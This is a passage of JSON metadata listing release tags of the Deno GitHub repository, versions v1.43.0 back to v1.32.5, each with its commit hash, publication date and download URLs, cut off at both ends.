6:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/d